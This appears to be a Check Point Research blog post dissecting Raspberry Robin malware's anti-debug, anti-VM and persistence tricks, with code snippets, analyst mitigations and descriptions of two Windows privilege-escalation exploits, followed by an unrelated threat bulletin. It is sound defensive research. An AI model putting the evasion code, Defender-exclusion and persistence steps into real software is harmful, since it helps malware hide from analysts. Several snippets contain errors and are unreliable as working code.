As we mentioned, Raspberry Robin has various evasion tricks, we decided to take some of them and elaborate on what those evasions try to check and how to avoid them not only for Raspberry Robin but also for other malware which can use those evasions as well. We recommend reading our evasions and anti-debug encyclopedias for information about many other techniques.

First, we highly recommend using several anti-anti-debug libraries to skip many of the evasions with ease. A good example of one would be ScyllaHide. ScyllaHide is an open-source anti-Anti-Debug library for user-mode evasions. It supports various debuggers such as x64dbg, IDA debugger and OllyDbg. If you desire a kernel-mode plugin then you have titanhide which hooks Nt* kernel functions using SSDT table hooks.

Another thing recommended before starting to work on malware these days is checking if your working machine can be detected easily by malware. For this case, there are many solutions such as our own tool – InviZzzible which helping assessing the virtual environment against a variety of evasions and al-khaser project.

Raspberry Robin evasions

PEB checks – Anti Debug

Special flags in system tables, which dwell in process memory and which an operation system sets, can be used to indicate that the process is being debugged. Raspberry Robin checks some of them.

First, it inspects two flags in the PEB (Process Environment Block) which is a structure that holds data about the current process. Those flags are:

• BeingDebugged – Indicates whether the specified process is currently being debugged and can be also queried with the API IsDebuggerPresent
• NtGlobalFlag – A flag that is 0 by default but if a process was created by a debugger then the following flags will be set:
  • FLG_HEAP_ENABLE_TAIL_CHECK (0x10)
  • FLG_HEAP_ENABLE_FREE_CHECK (0x20)
  • FLG_HEAP_VALIDATE_PARAMETERS (0x40)

Example code:

mov eax, fs:[30h] ; get PEB, in 64-bit it is in gs:[60h]
cmp byte ptr [eax+2], 0 ; checking BeingDebugged flag
jne being_debugged

mov al, [eax+68h] ; checking NtGlobalFlag
and al, 70h
cmp al, 70h ; (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS)
jz  being_debugged

Mitigations

Using ScyllaHide or any other Anti-Debug plugin setting those flags to 0. You can also edit those bytes yourself when you start debugging.

KUSER_SHARED_DATA check – Anti Debug

It also inspects a flag in KUSER_SHARED_DATA – a structure that provides a quick mechanism to obtain frequently needed global data from the kernel without involving user-kernel mode switching using system calls or interrupts. The structure is mapped at a fixed, hardcoded address on both kernel and user sides 0x7FFE0000 on 32-bit and 0xFFFFF78000000000 on 64-bit. The flag that is checked is KdDebuggerEnabled that returns TRUE if a kernel debugger is connected/enabled.

mov eax, 0x7ffe0000 ; KUSER_SHARED_DATA structure address
cmp byte ptr [eax+0x2d4], 0 ; checking KdDebuggerEnabled flag
jne being_debugged

Mitigations

You can patch it manually, also a draft code for patching kdcom.dll (kernel debugger) so it will not be detected was issued here.

User name and Computer name check – Anti VM

Usual hosts have meaningful and non-standard usernames/computer names. Particular virtual environments assign some predefined names to default users as well as computer names.

Raspberry Robin checks the username and computer name against a list of known default names given by VMs and analysts. Usually, those values are queried by GetComputerNameA and GetUserNameA but Raspberry Robin queries them differently. It finds the environment variables through PEB -> ProcessParameters(RTL_USER_PROCESS_PARAMETERS) ->  Environment and then loops through the environment block looking for the USERNAME and COMPUTERNAME variables.

.data
username db 255 dup(0)  ; buffer to hold the username
msg db "Username: ", 0

.code
start:
    ; Get a pointer to the PEB
    mov eax, fs:[30h]
    ; Get a pointer to the ProcessParameters member of the PEB
    mov eax, [eax + 0x10]
    ; Get a pointer to the Environment member of the ProcessParameters structure
    mov eax, [eax + 0x48]
    ; Loop through the environment block looking for the USERNAME variable
next_var:
    ; Read a null-terminated string from the environment block
    lodsb
    ; Check if the string is empty (i.e., end of environment block)
    test al, al
    jz end_env
    ; Check if the string starts with "USERNAME="
    cmp byte ptr [esi], 'U'
    jne next_var
    cmp dword ptr [esi+1], 'SER'
    jne next_var
    cmp dword ptr [esi+5], 'NAME'
    jne next_var
    cmp byte ptr [esi+9], '='
    jne next_var
    ; Copy the value of the USERNAME variable into the username buffer
    mov edi, offset username
    lea esi, [esi+10]
    rep movsb
end_env:
    ; Print the username to the console
    invoke StdOut, offset msg
    invoke StdOut, offset username
    ; Exit the program
    invoke ExitProcess, 0

; Define the Win32 API functions
StdOut      equ <GetStdHandle, WriteFile>
            extern StdOut :PROC
ExitProcess equ <GetProcAddress, GetModuleHandle, 0>
            extern ExitProcess :PROC

Mitigations

Change the Computer name and User name of your machine to non-suspicious values.

Process name & full path – Anti Debug and Anti VM

Some Virtual environments launch executables from specific paths. Moreover, some debuggers have default names for their DLL loaders such as x64dbg’s DLL loader.

Raspberry Robin queries for the name of the process’ main module as well as its full path.

To circumvent this evasion, use rundll32.exe to debug Raspberry Robin even if you use x64dbg.

Number of active CPUs – Anti-Sandbox

Analysis environments usually have a Low CPU core count. This information can be queried from the PEB (NumberOfProcessors) or using the GetSystemInfo API.

Raspberry Robin checks if there are fewer than 2 active processors. It does that by querying ActiveProcessorCount from the KUSER_SHARED_DATA structure.

mov eax, 0x7ffe0000  ; KUSER_SHARED_DATA structure fixed address
cmp byte ptr [eax+0x3c0], 2 ; checking ActiveProcessorCount
jb being_debugged

Mitigations

To circumvent this evasion in an analysis environment, configure the virtual machine to Assign two or more cores for Virtual Machine. As an alternative solution, patch/hook NtCreateThread to assign a specific core for each new thread.

For example on VMware Workstation Pro:

Memory pages – Anti Sandbox

Too little memory on a system in the current day and age might mean a low-performance system that the authors are not interested in, or are suspecting to be an analysis environment.

Raspberry Robin checks for how many physical memory pages are available in the system by querying NumberOfPhysicalPages from the KUSER_SHARED_DATA which is unique as most malware checks this by calling the API GetMemoryStatusEx.

Once met with too few pages, a flag is raised. The threshold is 204800 pages (800 MB) which is pretty low for personal computers. The standard amount for this kind of computer is around 8-16 GB of RAM.

  mov eax, 0x7ffe0000 ; KUSER_SHARED_DATA structure address
  cmp byte ptr [eax+0x2e8], 0x32000 ; checking NumberOfPhysicalPages
  jbe being_debugged

Patch NumberOfPhysicalPages in KUSER_SHARED_DATA or just assign more RAM for your VM.

Mac address Check – Anti VM

Vendors of different virtual environments hard-code some values as MAC addresses for their products — due to this fact such environments may be detected via checking the properties of appropriate objects.

Raspberry Robin not only compares its own adapter info with a list of blacklisted addresses but also compares the addresses in its ARP table. It does that by first populating it with GetBestRoute API and then getting the table info using GetIpNetTable.

int check_mac_vendor(char * mac_vendor) {
    unsigned long alist_size = 0, ret;
    ret = GetAdaptersAddresses(AF_UNSPEC, 0, 0, 0, &alist_size);

    if (ret == ERROR_BUFFER_OVERFLOW) {
        IP_ADAPTER_ADDRESSES* palist = (IP_ADAPTER_ADDRESSES*)LocalAlloc(LMEM_ZEROINIT,
                                                                                                                                                    alist_size);
        void * palist_free = palist;

        if (palist) {
            GetAdaptersAddresses(AF_UNSPEC, 0, 0, palist, &alist_size);
            char mac[6]={0};
            while (palist){
                if (palist->PhysicalAddressLength == 0x6) {
                    memcpy(mac, palist->PhysicalAddress, 0x6);
                    if (!memcmp(mac_vendor, mac, 3)) {  /* First 3 bytes are the same */
                        LocalFree(palist_free);
                        return TRUE;
                    }
                }
                palist = palist->Next;
            }
            LocalFree(palist_free);
        }
    }

    return FALSE;
}

Mitigations

Change your machine’s MAC address to a non-default address.

CPUID checks – Anti VM

The CPUID instruction is an assembly instruction that returns processor identification and features information to the EBX, ECX and EDX registers based on the value in the EAX register.

Raspberry Robin uses the CPUID instruction for several checks

• EAX = 0x40000000 – returns Vendor ID which Raspberry Robin compares to default IDs given in known virtual machine’s such as Microsoft hv (Hyper-V) or VMwareVMware (VMware)

    push ebx
    ; nullify output registers
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx
    
    mov eax, 0x40000000 ; call cpuid with argument in EAX
    cpuid
    
    mov edi, vendor_id     ; store vendor_id ptr to destination
  
    ; move string parts to destination
    mov eax, ebx  
    stosd
    mov eax, ecx 
    stosd
    mov eax, edx 
    stosd

    ; now check this against the different strings connected to VMs

• EAX = 0x1 – returns a set of feature flags These flags indicate the CPU’s capabilities and features, such as whether it supports MMX, SSE, or AVX instructions, as well as information about the CPU’s stepping, model, and family. One of the flags is in the 31st bit in ECX which indicates whether the program is being run in Hypervisor.

    xor ecx, ecx    
    mov eax, 1 // sets EAX to 1
    cpuid

    bt ecx, 31 // set CF equal to 31st bit in ECX
    setc al // set AL to the value of CF
        test eax, eax
        jne being_debugged

Mitigations

Different VM solutions have different ways of how to modify CPUID and CPU features. For example, in VMWare you can edit the configuration file (.vmx) and add the following lines:

• cpuid.40000000.ecx = “0000:0000:0000:0000:0000:0000:0000:0000” cpuid.40000000.edx = “0000:0000:0000:0000:0000:0000:0000:0000” – for the first (EAX = 0X40000000) check
• cpuid.1.ecx = ”0—:—-:—-:—-:—-:—-:—-:—-” – for the Hypervisor (EAX = 1) check

PEB module enumeration – Anti Debug and Anti Sandbox

Using the PEB, a program can enumerate the modules loaded in its memory by iterating through the list of modules stored in the PEB’s “Ldr” (Loader) data structure. Each module in the list contains information such as its base address, entry point, and size, which can be used to analyze the module and its contents.

Raspberry Robin uses that technique to check if blacklisted applications that inject their module into processes (hashed) name exists in the hardcoded blacklist. Those modules can be sandbox-related or anti-anti-debug libraries such as ScyllaHide.

Mitigations

To circumvent this evasion, the following options are available:

• Don’t load foreign modules into the process of the malware.
• Load your foreign module of choice and then unlink it from the PEB, or use a different method to load it, such as manual mapping.

// Unlinking specific module from PEB's InMemoryOrderModuleList 
bool unlink()
{
    HMODULE mod = nullptr;
    if(!GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | 
                                                    GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, 
                                                    reinterpret_cast<LPCSTR>(&unlink), &mod))
    {
        return false;
    }
    wchar_t module_name[MAX_PATH];
    if(GetModuleFileNameW(mod, module_name, sizeof(module_name)))
    {
        return false;
    }
    #ifdef _WIN64    auto peb = reinterpret_cast<PEB*>(__readgsqword(0x60));
    #else    auto peb = reinterpret_cast<PEB*>(__readfsdword(0x30));
    #endif    for(auto peb_link = peb->Ldr->InMemoryOrderModuleList.Flink; peb_link != 
                                    &peb->Ldr->InMemoryOrderModuleList; peb_link = peb_link->Flink)
    {
        if(::wcscmp(reinterpret_cast<LDR_DATA_TABLE_ENTRY*>(peb_link)->FullDllName.Buffer,
                                         module_name) == 0)
        {
            peb_link->Flink->Blink = peb_link->Blink;
            peb_link->Blink->Flink = peb_link->Flink;
            return true;
        }
    }
    return false;

MulDiv – Anti Wine

The MulDiv API is being called with specific arguments (MulDiv(1, 0x80000000, 0x80000000)) which should logically return 1 – however, due to a bug with the ancient implementation on Windows, it returns 2.

Raspberry Robin uses this check in order to detect Wine which for some reason returns 0 (even the latest version, as of today). There are more known evasion methods to detect Wine like the good old check of searching for the existence of one of Wine’s exclusive APIs such as kernel32.dll!wine_get_unix_file_name or ntdll.dll!wine_get_host_version).

Here is an example of comparing the execution using the Windows implementation of MulDiv, a logically correct implementation (which is not backward compatible), and Wine’s C++ implementation.

If Using Wine, hook MulDiv to return 2 or modify the implementation as it works in Windows.

Devices detections – Anti VM

Virtual environments emulate hardware devices and display devices and leave specific traces in their descriptions – which may be queried and the conclusion about non-host OS made.

Raspberry Robin tries to evade by checking the ProductID of \\.\PhysicalDrive0 and DeviceIDs of the display devices and comparing them to a list of blacklisted known names.

bool GetHDDVendorId(std::string& outVendorId) {
    HANDLE hDevice = CreateFileA(_T("\\\\.\\PhysicalDrive0"), 
                                 0, 
                                 FILE_SHARE_READ | FILE_SHARE_WRITE, 
                                 0, 
                                 OPEN_EXISTING, 
                                 0, 
                                 0);
    
    STORAGE_PROPERTY_QUERY storage_property_query = {};
    storage_property_query.PropertyId = StorageDeviceProperty;
    storage_property_query.QueryType = PropertyStandardQuery;
    STORAGE_DESCRIPTOR_HEADER storage_descriptor_header = {};
    DWORD BytesReturned = 0;
  
    DeviceIoControl(hDevice, IOCTL_STORAGE_QUERY_PROPERTY, 
                         &storage_property_query, sizeof(storage_property_query), 
                         &storage_descriptor_header, sizeof(storage_descriptor_header), 
                         &BytesReturned);
 
  
    std::vector<char> buff(storage_descriptor_header.Size); //_STORAGE_DEVICE_DESCRIPTOR
    DeviceIoControl(hDevice, IOCTL_STORAGE_QUERY_PROPERTY, 
                         &storage_property_query, sizeof(storage_property_query), 
                         buff.data(), buff.size(), 0);
  
    
    STORAGE_DEVICE_DESCRIPTOR* device_descriptor = (STORAGE_DEVICE_DESCRIPTOR*)buff.data();
    if (device_descriptor->VendorIdOffset){
        outVendorId = &buff[device_descriptor->VendorIdOffset];
    }
}

Mitigations

To circumvent this evasion you can hook DeviceIoControl or rename HDD so that it will not be detected by specific strings

Firmware tables – Anti VM

There are special memory areas used by OS that contain specific artifacts if OS is run under a virtual environment. These memory areas may be dumped using different methods depending on the OS version.

Firmware tables are retrieved via SYSTEM_FIRMWARE_TABLE_INFORMATION object. In our case, Raspberry Robin checks if specific strings are present in Raw SMBIOS Firmware Table. It does that by calling NtQuerySystemInformation with SystemFirmwareTableInformation argument (76).

// First, SYSTEM_FIRMWARE_TABLE_INFORMATION object is initialized in the following way:
SYSTEM_FIRMWARE_TABLE_INFORMATION *sfti = 
    (PSYSTEM_FIRMWARE_TABLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 
     Length);
sfti->Action = SystemFirmwareTable_Get;  // 1
sfti->ProviderSignature = 'RSMB'; // raw SMBIOS
sfti->TableID = 0;
sfti->TableBufferLength = Length;

// Then initialized SYSTEM_FIRMWARE_TABLE_INFORMATION object is used as an argument for
// the system information call in the following way in order to dump raw firmware table:
NtQuerySystemInformation(
    SystemFirmwareTableInformation,  // 76 
    sfti,
    Length,
    &Length);

Mitigations

To circumvent this evasion hook NtQuerySystemInformation for retrieving SystemFirmwareTableInformation class and parse the SFTI structure for provided field values.

Vectored Exception Filter – Anti Debug

Vectored exception handler (VEH) is a Windows operating system feature that allows programs to register a callback function to handle certain types of exceptions that occur during program execution. It is an extension of Structured Exception Handling (SEH) and it is being called for unhandled exceptions regardless of the exception’s location.

Then, every time those exceptions are triggered the exception handler will be called. But when a debugger is attached to a program, it becomes the exception handler for the program’s exceptions, which allows it to intercept and handle exceptions before they are handled by the program’s normal exception-handling mechanism. That means that if the program is running under a debugger, the custom filter won’t be called and the exception will be passed to the debugger.

Raspberry Robin adds a handler using RtlAddVectoredExceptionHandler and then deliberately causes exceptions (such as in the above assembly instruction part) to verify if the control passed to the handler which means further that the process running without a debugger.

include 'win32ax.inc'

invoke RtlAddVectoredExceptionHandler, not_debugged
int  3
jmp  being_debugged

not_debugged:
        ; continue the process...

being_debugged:
        invoke  ExitProcess,0

Mitigations

To circumvent this evasion, you can patch KiUserExceptionDispatcher which ScyllaHide implements. Also, you can patch the opcodes which cause the exception.

Hardware breakpoints – Anti Debug

Hardware breakpoints are implemented using dedicated hardware resources within the CPU, including registers that are used to store the parameters for the breakpoints. Debug Address Registers (DR0-DR3) are among those registers and they are used to store the memory addresses or data values that the breakpoints are set on.

DR0-DR3 can be retrieved from the thread context structure. If they contain non-zero values, it may mean that the process is executed under a debugger and a hardware breakpoint was set.

Raspberry Robin uses the fact of having the CONTEXT structure that is given as an argument to the exception handler and inspects it. This is without using the API GetThreadContext which is more commonly used to query the context structure.

To circumvent this evasion you can hook GetThreadContext and modify debug registers or in our case as it happens in VEH we can again hook KiUserExceptionDispatcher.

Assembly Instructions – Anti Debug

There are some techniques are intended to detect a debugger presence based on how debuggers behave when the CPU executes a certain instruction.

Raspberry Robin uses some of them in different execution stages:

POPF and CPUID

To detect the use of a VM in a sandbox, malware could check the behavior of the CPU after the trap flag is set. The trap flag is a flag bit in the processor’s flags register that is used for debugging purposes. When the Trap Flag is set, the processor enters a single-step mode, which causes it to execute only one instruction at a time and then generate a debug exception.

In our case, The popfinstruction pops the top value from the stack and loads it into the flags register. Based on the value on the stack that has the Trap Flag bit set, the processor enters a single-step mode (SINGLE_STEP_EXCEPTION) after executing the next instruction.

But the next instruction is cpuid which behaves differently in VM. When in a physical machine, this exception stops the CPU execution to allow the contents of the registers and memory location to be examined by the exception handler after thecpuid instruction which moves away the instruction pointer from the next bytes. In a VM, executing cpuid will result in a VM exit. During the VM exit the hypervisor will carry out its usual tasks of emulating the behaviors of the cpuid instruction which will make the Trap Flag be delayed and the code execution will continue to the next instruction with the C7 B2 bytes. This results in an exception because of an illegal instruction exception.

The vectored exception handler we mentioned above checks for this type of exception (Illegal instruction) and if it encounters such an exception, Raspberry Robin knows it runs under a VM.

Stack Segment Reigster

The trick relies on the fact that certain instructions cause all of the interrupts to be disabled while executing the next instruction. This is happening using the following code:

push ss
pop ss
pushf
test byte ptr [esp+1], 1
jnz being_debugged

The register ss is called the Stack Segment and is a special-purpose register that stores the segment address of the current stack.

Loading the ss (Stack segment) register clears interrupts to allow the next instruction to load the esp register without the risk of stack corruption. However, there is no requirement that the next instruction loads anything into the esp register.

If a debugger is being used to single-step through the code, then the Trap Flag will be set in the EFLAGS image. This is typically not visible because the Trap Flag will be cleared in the EFLAGS image after each debugger event is delivered. However, if the flags are saved to the stack using the pushf instruction before the debugger event is delivered, then the Trap Flag will become visible. Therefore, comparing the flag on the stack can tell us whether the sample is being debugged.

INT 3

INT3 is an interruption that is used as a software breakpoint. Without a debugger present, after getting to the INT3 instruction, the exception EXCEPTION_BREAKPOINT(0x80000003) is generated and an exception handler will be called. If the debugger is present, the control won’t be given to the exception handler but to the debugger itself.

Besides the short form of INT3 instruction (CC opcode), there is also a long form of this instruction: CD 03 opcode.

When the exception EXCEPTION_BREAKPOINT occurs, Windows decrements the EIP register to the assumed location of the CC opcode and passes the control to the exception handler. In the case of the long form of the INT3 instruction, EIP will point to the middle of the instruction (means to the 03 byte). Therefore, EIP should be edited in the exception handler if we want to continue execution after the INT3 instruction (otherwise we’ll most likely get an EXCEPTION_ACCESS_VIOLATION exception). If not, we can neglect the instruction pointer modification.

bool IsDebugged()
{
    __try
    {
        __asm int 3;
        return true;
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        return false;
    }
} 

Mitigations

The best way to mitigate all the following checks is to find those methods and patch them with NOP instructions.

Thread hiding – Anti Debug

In Windows 2000, a new class of thread information was added to the API NtSetInformationThread – ThreadHideFromDebugger. It was added because when you attach a debugger to a remote process a new thread is created. If this was just a normal thread the debugger would be caught in an endless loop as it attempted to stop its own execution.

So behind the scenes when the debugging thread is created Windows calls NtSetInformationThread with the ThreadHideFromDebugger flag set (1). This way the process can be debugged and a deadlock prevented. Allowing code execution to continue as normal.

If this flag is set for a thread, then that thread stops sending notifications about debug events. These events include breakpoints and notifications about program completion. Due to this flag, the debugger cannot see the thread and is now unable to trap these events.

Raspberry Robin enables the flag on newly spawned threads and then queries this information again using the API NtQueryInformationThread to check if the flag was set.

bool HideFromDebugger(HANDLE hThread) {
    int status;
    int lHideThread = 1;
    // ThreadHideFromDebugger = 0x11
    status = NtSetInformationThread(hThread, ThreadHideFromDebugger, 0, 0);
    // check if the thread is hidden
  status = NtQueryInformationThread(hThread, ThreadHideFromDebugger, &ThreadInformation, 1u, 0);
    
    return status
}

Mitigations

To circumvent this evasion you need to hook NtSetInformationThread. In our case, you also need to hook NtQueryInformationThread.

NtQueryInformationProcess flags – Anti Debug

The API NtQueryInformationProcess can retrieve a different kind of information from a process. It accepts a ProcessInformationClass parameter which specifies the information you want to get and defines the output type of the ProcessInformation parameter.

Raspberry Robin uses this API in order to query the following values:

• ProcessDebugPort (ProcessInformationClass = 7) – returns the port number of the debugger for the process.

• ProcessDebugFlags (ProcessInformationClass = 0x1f) – returns the inverse value of the field NoDebugInherit which is a boolean value that determines whether child processes inherit the debugging privileges of their parent process. This flag resides in the EPROCESS object.

• ProcessDebugObjectHandle (ProcessInformationClass = 0x1e) – returns a handle to a kernel object that can be used to attach a debugging object to a process, allowing a debugger to control the process and access its memory and state. When a process is created, it does not have a debugging object associated with it by default. However, a debugger can use the API OpenProcess with the DEBUG_ONLY_THIS_PROCESS or DEBUG_PROCESS flags to create a ProcessDebugObjectHandle for the process.

Mitigations

To circumvent this evasion hook NtQueryInformationProcess and set the following values in return buffers:

• 0 (or any value except -1) in the case of ProcessDebugPort
• A non-zero value in the case of ProcessDebugFlags
• 0 in the case of ProcessDebugObjectHandle

DbgBreakPoint patch – Anti Debug

DbgBreakPoint is the API called when a debugger attaches to a running process. It allows the debugger to gain control because an exception is raised which it can intercept. The API has the following implementation:

cc int3
c3 ret

by replacing the first byte (int3 = 0xcc) with a ret (0xc3) instruction, the debugger won’t break in and the thread will exit.

void Patch_DbgBreakPoint()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll)
        return;

    FARPROC pDbgBreakPoint = GetProcAddress(hNtdll, "DbgBreakPoint");
    if (!pDbgBreakPoint)
        return;

    DWORD dwOldProtect;
    if (!VirtualProtect(pDbgBreakPoint, 1, PAGE_EXECUTE_READWRITE, &dwOldProtect))
        return;

    *(PBYTE)pDbgBreakPoint = (BYTE)0xC3; // ret
}

Mitigations

To circumvent this evasion, you can patch DbgBreakPoint back after the modification (can be as part of hooking VirtualProtect).

Process Suspension detection – Anti Debug

This evasion depends on having the thread creation flag THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (name given by researcher) that Microsoft added into 19H1. This flag makes the thread ignore any PsSuspendProcess API being called.

Raspberry Robin uses this flag for a cool trick. It creates two threads with this flag, one of which keeps suspending the other one until the suspend counter limit which is 127 is reached (suspend count is a signed 8-bit value).

When you get to the limit, every call for PsSuspendProcess doesn’t increment the suspend counter and returns STATUS_SUSPEND_COUNT_EXCEEDED. But what happens if someone calls NtResumeProcess? It decrements the suspend count! So when someone decides to suspend and resume the thread, they’ll actually leave the count in a state it wasn’t previously in. Therefore, Raspberry Robin calls periodically to NtSuspendThread and if it succeeds and increments the counter it means that the thread has been externally suspended and resumed and is being debugged.

Mitigations

To circumvent this evasion, you can hook NtCreateThread to omit the THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZEIt flag.

VBAWarnings check – Anti Sandbox

You all know the “Enable all macros” prompt in Office documents. It means the macros can be executed without any user interaction. This behavior is common for sandboxes.

Raspberry Robin uses that in order to check if it is running on a sandbox checking the flag in the registry keys SOFTWARE\Microsoft\Office\<version>\Word\Security\VBAWarnings while the version is between 12.0 to 19.0.

Mitigations

To circumvent this evasion disable this flag or hook SHGetValueW or other registry query APIs such asRegQueryValueExA.

Main stage tricks

Raspberry Robin not only has numerous evasions but also some really nice tricks of how not being detected by security solutions.

IFEO Removal

This technique involves modifying the Image File Execution Options (IFEO) registry key, which is used by the Windows operating system to set debugging options for executable files. When an executable file is launched, the operating system checks the corresponding IFEO registry key for any specified debugging options. If the key exists, the operating system launches the specified debugger instead of the executable file.

What Raspberry Robin does is remove the registry keys for the following files so they will run instead of the debugger:

• rundll32.exe
• regsvr32.exe
• dllhost.exe
• msiexec.exe
• odbcconf.exe
• regasm.exe
• regsvcs.exe
• installutil.exe
• explorer.exe

Windows Defender Exclusion List

Raspberry Robin tries to evade Windows Defender by adding its processes and paths to its exclusion list by adding the values to the registry keys: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths and HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Processes.

Persistence trick

Raspberry Robin Creates a file with a random name and extension and puts it in %TEMP% directory. Then, the malware writes the command shell32.dll|ShellExec_RunDLLA|REGSVR32.EXE -U /s "C:\Windows\Temp <generated_file_name>.” to RunOnce or RunOnceEx key but with a twist.

Raspberry Robin tries to evade security solutions by first generating a random registry key inside HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion and renaming the RunOnce key to this random name. Then add the new value to this random key before renaming it back to RunOnce.

Now that we’ve covered the various evasive tactics, let’s shift our focus to the exploits used by the malware.

Privilege escalation

Raspberry Robin has several ways of how it elevates its privileges – two UAC methods, which were covered in avast’s blogpost and two 1-days EoP exploits. Raspberry Robin only runs those methods only in case this malware really needs them. Those checks including:

• Process’s SID isS-1-5-32-544(DOMAIN_ALIAS_RID_ADMIN)
• The integrity level is 0x3000 (high integrity) or 0x2000 (medium integrity)
• If consent by user or admin is required – HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser/Admin
• If the time of the last input event (calling to GetLastInput) is in the last hour.

Below we drill down into the EoP exploits used by the malware.

The malware contains 2 exploits, which are embedded and encrypted by RC4 in memory. Each exploit is suitable for different versions of windows which increases the odds of the malware elevating its privileges on a random victim’s machine.

Both exploits are 64-bit and packed with the same packer known as Donut Loader. The packer is injected as a shellcode with KernelCallbackTable injection as copied from the open-source POC. The exploits are injected into winver.exe which is also added to the Windows Defender excluded list.

The exploits share code such as the encryption scheme of loops of math expressions for their strings (such as class names and loaded modules).

CVE-2020-1054

CVE-2020-1054 is Win32k Elevation of Privilege Vulnerability reported by Check Point Research. The vulnerability is out of bounds write in win32k and it was used by different Exploit kits in the past. The exploit has some similarities to open-source GitHub POCs but we haven’t found one that surely is the base for this implementation. The exploit is only used by Raspberry Robin on Windows 7 systems where the revision number is not higher than 24552 (It gets the build number through the BuildLabEx registry key).

Versioning Decisions

Depends on the environment variable that Raspberry Robin’s main module sets. This variable means what kind of Windows 7 we have (with patches or not – for different offsets). The exploit uses this variable in order to decide 2 offsets:

• xleft_offset – 0x900 or 0x8c0
• oob_offset – 0x238 or 0x240

HMValidateHandle Wrapper

Gets the HMValidateHandle from searching inside the IsMenu code for 0xe8 opcode. It searches in the first 0x20 bytes for this opcode.

Privilege Elevation

The exploit uses a shellcode, different than the ones in GitHub doing the same replacing of the process’s token. This shellcode is invoked by sending a message after the API SetBitmapBits

Naming

The name of the window used in this exploit is “#32272” so it can’t be used for hunting as it’s pretty known and used in many places.

Token Swap

In the shellcode, it is pretty straightforward:

• We search for the target process – using the target PID
• We search for SYSTEM – using a PID of 4
• We update our pointer to point at SYSTEM’s token

CVE-2021-1732

CVE-2021-1732 is a win32k window object type confusion leading to an OOB (out-of-bounds) write. It was used as a 0-day in the wild by Bitter APT and written by Moses – also known as Exodus Intelligence. We found some resemble to an open source POC in both the flow and how to restore windows after changing the token but also some differences.

CVE-2021-1732 runs on Windows 10, with the targeted build number range being from 16353 to 19042. For the second exploit, it also checks if the package KB4601319 of the patch is present.

Versioning Decisions

Querying OSBuildNumber from the PEB in order to decide on a number of offsets (some of them are 0x40 different from real offset due to the type of read primitive):

• Build number greater than 19041
  • offset_ActiveProcessLinks = 0x448
  • offset_token = 0x4b8
  • offset_UniqueProcessId = 0x400
• Build number greater than 18362 but less than 19041
  • offset_ActiveProcessLinks = 0x2f0
  • offset_token = 0x360
  • offset_UniqueProcessId = 0x2a8
• Build number greater than 15063 but less than 18362
  • offset_ActiveProcessLinks = 0x2e8
  • offset_token = 0x358
  • offset_UniqueProcessId = 0x2a0
• Build number less than 15063
  • offset_ActiveProcessLinks = 0x2f0
  • offset_token = 0x358
  • offset_UniqueProcessId = 0x2a8

This is pretty weird because the check inside RaspberryRobin is that the version is between 16353  to 19042

HMValidateHandle Wrapper

As in CVE-2020-1054, it gets the HMValidateHandle from searching inside the IsMenu code for 0xe8 opcode. It searches in the first 0x20 bytes for this opcode. This function is identical to the same function in the other exploit.

Naming

Registering class with the name: “helper_cls” and then registering (spray handles) windows from this class with the name: “helper”.

Privilege Elevation

The exploit uses Arbitrary-Read & Arbitrary-Write exploit primitives, based on the vulnerability feature in conjunction with GetMenuBarInfo and Call SetWindowLong to write data to the address of the kernel-space desktop heap.

Token Swap

Scanning the EPROCESS.ActiveProcessLinks until finding the System process (PID = 4) and our process (equal our PID) using an Arbitrary-Read / Arbitrary-Write exploit primitives. It then writes the process’s token address to wndMax.pExtraBytes and then writes to this address the system token.

Notable info

The exploit gets the ETHREAD structure using the API NtQuerySystemInformation with SystemExtendedHandleInformation and iterates SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX for handles until getting the one with the thread ID as the running thread.

Conclusion

Anti-debugging and other evasions can be pretty exhausting, and even more when it comes to such obfuscation methods and volume of methods as Raspberry Robin implements. We showed plenty of methods with explanations of how they work and how to evade those evasions. Raspberry Robin implemented other cool tricks and exploits showing that he also has capabilities in the exploiting area. Unfortunately, the world of evasions is only getting harder and more creative, so buckle up and pray that somebody already encountered this evasion before you.

Check Point TE has developed and deployed a signatures named “Trojan.Wins.RaspberryRobin” to detect and protect our customers against the malware.

The post Raspberry Robin: Anti-Evasion How-To & Exploit Analysis appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 17th April, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• Two major automotive manufacturers Hyundai and Toyota have disclosed significant data breaches. Hyundai’s Italian and French car owners were affected, along with individuals who booked a test drive. The leaked data consists of clients’ personal information including emails, addresses, phone numbers, and vehicle chassis numbers. The Japanese automaker Toyota confirmed that the breach on their side exposed a large amount of sensitive information including API tokens for the software business Mapbox as well as credentials to digital marketing platform Salesforce Marketing Cloud, which could be used to reach out to the company’s clients.
• The media player maker Kodi has disclosed a data breach that caused a leakage of more than 400K records of its users’ forum. The threat actors published the organization’s MyBB forum database for sale on underground forums, including usernames, email addresses, encrypted (hashed and salted) passwords, public forum posts, staff forum posts, and private messages.
• Ukrainian hacktivists group Cyber Resistance has leaked personal information of Sergey Morgachev, the alleged leader of the Russian state-sponsored group APT28 (Fancy Bear) and Russia’s Main Intelligence Directorate of the GRU. The leaked data consists of email, social media, and personal accounts.

Check Point Harmony Endpoint provides protection against this threat (APT.Win.Fancybear)

• Karakurt ransomware extortion group claims to have attacked two US medical entities: Medicalodges in Kansas, and Petaluma Health Center in California. The threat actors claimed they have access to 170GB of Medicalodges data, including social security numbers, client NDAs, and medical diagnoses.
• Belgian HR and Payroll Company SD Worx has been a victim of a cyber-attack that caused a shutdown of IT systems in its UK and Ireland divisions. It is still unclear whether any sensitive data was stolen during this incident.
